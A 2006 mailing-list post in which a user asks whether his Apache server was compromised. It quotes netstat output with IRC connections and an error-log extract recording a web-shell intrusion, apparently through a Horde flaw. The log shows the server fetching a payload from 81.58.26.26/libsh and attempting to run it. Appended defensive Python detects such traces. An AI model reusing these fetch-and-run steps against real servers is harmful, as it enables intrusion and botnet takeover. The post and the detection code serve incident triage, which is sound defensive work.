[H-GEN] apache2 compromised or just attempts?

Troy Piggins troy at piggo.com
Sun May 28 20:21:47 EDT 2006


* Troy Piggins <troy at piggo.com> :
> 
[snip]
> Yesterday the web server stopped working.  It is not showing up in 'pstree'.
> Look at netstat and this is the (worrying) output:
> 
> -----8<-----
> Active Internet connections (w/o servers)
> Proto Recv-Q Send-Q Local Address           Foreign Address         State
> tcp        0      0 armadillo.p:netbios-ssn linus.piggo.local:rootd ESTABLISHED
> tcp        0      0 localhost.localdo:51625 localhost.localdo:32769 ESTABLISHED
> tcp        0      0 10.1.1.11:43404         zagreb.hr.eu.under:ircd ESTABLISHED
> tcp        0      0 10.1.1.11:43411         zagreb.hr.eu.under:ircd ESTABLISHED
> tcp        0      0 10.1.1.11:55893         lemming.euronet.nl:ircd ESTABLISHED
> tcp        0      0 10.1.1.11:47631         checkip.chi.dyndns.:www CLOSE_WAIT
> tcp        0      0 localhost.localdo:32769 localhost.localdo:51625 ESTABLISHED
> tcp        0      0 10.1.1.11:33570         oslo2.no.eu.undern:6669 ESTABLISHED
> tcp        1      0 armadillo.piggo.d:49430 armadillo.piggo.dy:nntp CLOSE_WAIT
> [snip]
> -----8<-----
> 
> 10.1.1.11 is my ubuntu machine's ip address of its wireless card connection
> to my wireless modem/router.
> 
> What the hell are those ircd entries?  Am I compromised?  What is my next
> step?

I've since found out that it's a horde 3 vulnerability - well that's the likely
candidate at the moment.

I've uninstalled it, but how do I stop those irc servers?

> [1] extract of /var/log/apache1/error.log.4.gz
> 
> -----8<-----
> [Mon May 01 15:38:10 2006] [error] [client 216.65.11.137] script '/var/www/thisdoesnotexistahaha.php' not found or unable to stat
> [Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist: /var/www/horde-cvs
> [Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist: /var/www/pub/horde-cvs
> --20:41:57--  http://81.58.26.26/libsh/ping.txt
>            => `ping.txt'
> Connecting to 81.58.26.26:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 358 [text/plain]
> ping.txt: Permission denied
> 
> Cannot write to `ping.txt' (Permission denied).
> mv: cannot stat `ping.txt': No such file or directory
> perl: warning: Setting locale failed.
> perl: warning: Please check that your locale settings:
>         LANGUAGE = "en_US",
>         LC_ALL = (unset),
>         LANG = "en_US"
>     are supported and installed on your system.
> perl: warning: Falling back to the standard locale ("C").
> Can't open perl script "temp2006": No such file or directory
> --20:41:57--  http://81.58.26.26/libsh/ping
>            => `ping'
> Connecting to 81.58.26.26:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 15,808 (15K) [text/plain]
> ping: Permission denied
> 
> Cannot write to `ping' (Permission denied).
> chmod: invalid mode string: `x'
> sh: ./ping: No such file or directory
> sh: curl: command not found
> -----8<-----

-- 
Troy Piggins
  ,-o    Ubuntu v5.10 (Breezy Badger): kernel 2.6.12-10-k7,
 o   )   postfix 2.2.4, procmail 3.22, mutt 1.5.11i,
  `-o    slrn 0.9.8.1/rt (score_color patch), vim 7.0
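A defender's triage of the two artefacts quoted in this message, added here as an example and not part of the original thread: it flags wget/perl/sh output that has ended up inside Apache's error.log (only something executed by the web server process writes there), the URL that was being fetched, the client probing for Horde paths, and the netstat entries that point at IRC servers. The samples are constructed from the lines in the post, and the tool prefixes and IRC port set are my assumptions.

```python
import re

# Constructed samples modelled on the lines quoted in the post; not the real files.
SAMPLE_ERROR_LOG = """\
[Mon May 01 15:38:10 2006] [error] [client 216.65.11.137] script '/var/www/thisdoesnotexistahaha.php' not found or unable to stat
[Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist: /var/www/horde-cvs
--20:41:57--  http://81.58.26.26/libsh/ping.txt
           => `ping.txt'
Cannot write to `ping.txt' (Permission denied).
Can't open perl script "temp2006": No such file or directory
chmod: invalid mode string: `x'
sh: curl: command not found
"""
SAMPLE_NETSTAT = """\
tcp        0      0 10.1.1.11:43404         zagreb.hr.eu.under:ircd ESTABLISHED
tcp        0      0 10.1.1.11:33570         oslo2.no.eu.undern:6669 ESTABLISHED
tcp        1      0 armadillo.piggo.d:49430 armadillo.piggo.dy:nntp CLOSE_WAIT
"""

APACHE_LINE = re.compile(r"^\[\w{3} \w{3} \d\d \d\d:\d\d:\d\d \d{4}\] \[")
# Output only wget, perl, chmod, mv or sh would write; none of it belongs in error.log (assumed list).
TOOL_PREFIXES = ("--", "=> `", "Connecting to ", "HTTP request sent", "Cannot write to ",
                 "perl: ", "Can't open perl script", "chmod: ", "mv: ", "sh: ")
FETCH_URL = re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)")
RECON_PROBE = re.compile(r"\[client ([\d.]+)\] (?:File does not exist|script '[^']*' not found)")
IRC_PORTS = set(range(6660, 6670)) | {7000}  # common IRC ports; assumed, extend as needed

def scan_error_log(text):
    # Returns (tool output lines, URLs fetched by the web server, probing client -> count).
    foreign, urls, probes = [], [], {}
    for line in text.splitlines():
        if APACHE_LINE.match(line):
            m = RECON_PROBE.search(line)
            if m:
                probes[m.group(1)] = probes.get(m.group(1), 0) + 1
        elif line.lstrip().startswith(TOOL_PREFIXES):
            foreign.append(line)
            urls.extend(FETCH_URL.findall(line))
    return foreign, urls, probes

def irc_connections(netstat_text):
    # Returns (foreign address, state) for each TCP connection to an IRC service or port.
    hits = []
    for line in netstat_text.splitlines():
        cols = line.split()
        if len(cols) < 6 or not cols[0].startswith("tcp"):
            continue
        port = cols[4].rpartition(":")[2]
        if port == "ircd" or (port.isdigit() and int(port) in IRC_PORTS):
            hits.append((cols[4], cols[5]))
    return hits
```

Run `netstat -tnp` as root to get the owning PID for each flagged connection; that process (and the user it runs as) is the one to investigate and stop.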